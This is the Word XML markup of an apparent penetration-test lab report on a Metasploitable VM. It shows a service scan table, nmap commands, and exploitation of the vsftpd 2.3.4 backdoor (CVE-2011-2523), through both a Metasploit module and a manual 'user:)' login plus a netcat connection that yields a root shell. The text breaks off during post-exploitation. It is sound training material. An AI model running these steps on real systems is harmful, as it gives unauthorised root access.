                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6C39B68E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OpenSSH 4.7p1 Debian 8ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2C7F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2A263483">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7739C21E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="09498EB5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B35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Pr>
          <w:p w14:paraId="13F53803">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>25/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3DA0BC5D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="009B01EC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Postfix smtpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4318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039D8196">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="663C9B7E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="008368E4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache httpd 2.2.8 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="49B3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Pr>
          <w:p w14:paraId="5157125B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>139/445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A1A8AF5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>netbios-ssn / smb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="542A7668">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Samba smbd 3.X – 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="775E4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563314FE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1524/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="54794B81">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bindshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="20D96343">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Metasploitable root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="67729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Pr>
          <w:p w14:paraId="4908FFBE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3306/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A116045">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="55FE754E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7417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6A433059">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5432/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3755FF45">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>postgresql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1C8936BB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL DB 8.3.0-8.3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2DAF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Pr>
          <w:p w14:paraId="645C193B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6667/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="482EEF3E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6C87D6B7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0E7B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066C8580">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8180/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="69B966B8">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="67742914">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apache Tomcat/Coyote JSP 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="440B8CB5">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3B46F9">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A targeted vulnerability scan was then run to narrow down exploitable services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBB70EB">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nmap --script vuln -T4 -p 21,22,23,25,80,139,445,3306,5432,6667,8180 192.168.56.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7996B22B">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The vsftpd 2.3.4 service on port 21 was selected as the primary exploitation target due to its well-documented, high-severity backdoor vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419FB28F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5. Phase 3: Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CF783C">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.1 Vulnerability Details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6892F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7CBFCD91">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03BCBEE7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>vsftpd 2.3.4 (FTP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22159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0F5918DE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CVE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D072CCA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CVE-2011-2523</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="352F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194C4ECB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32925487">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Malicious backdoor / Unauthenticated Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D38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774880C3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2846724C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="09881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79742B3C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31535102">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>The vsftpd 2.3.4 source package distributed between June 30 and July 3, 2011 was compromised by an attacker who inserted a backdoor. Sending the string "user:)" as the FTP username triggers the backdoor, which opens a root shell listener on TCP port 6200.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70750BC7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.2 Exploitation Attempt – Metasploit Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BF827">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The Metasploit Framework module for this vulnerability was attempted first:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441960AF">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msfconsole</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>search vsftpd</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.56.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set LHOST 192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5924D5">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit correctly fingerprinted the target as vulnerable (“FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)”, “backdoor may be present”) but repeated automated attempts failed to establish a session, returning “Unable to connect to backdoor on 6200/TCP. Cooldown?”. This is a known reliability issue with this specific module, where automated timing does not always align with the backdoor’s trigger window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4190DC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>5.3 Exploitation – Manual Method (Successful)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8CFA2">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Given the automated module's inconsistency, the backdoor was triggered manually using two terminal sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FE703E">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Terminal 1 – trigger the backdoor via FTP login:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142C59CE">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ftp 192.168.56.106</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Name: user:)</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[connection drops – this is expected; the trigger has fired]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65EC82">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Terminal 2 – connect to the root shell opened on port 6200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705DE50">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nc 192.168.56.106 6200</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977DCFF">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The manual trigger succeeded, returning an unauthenticated root shell on the target system. This confirms the vulnerability is genuinely exploitable and that the earlier Metasploit failures were a tooling/timing issue rather than a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A982A3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>6. Phase 4: Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30D395">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>With root access confirmed, the following commands were run inside the compromised shell (Terminal 2) to verify and document the level of access obtained:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05364EDC">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id</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
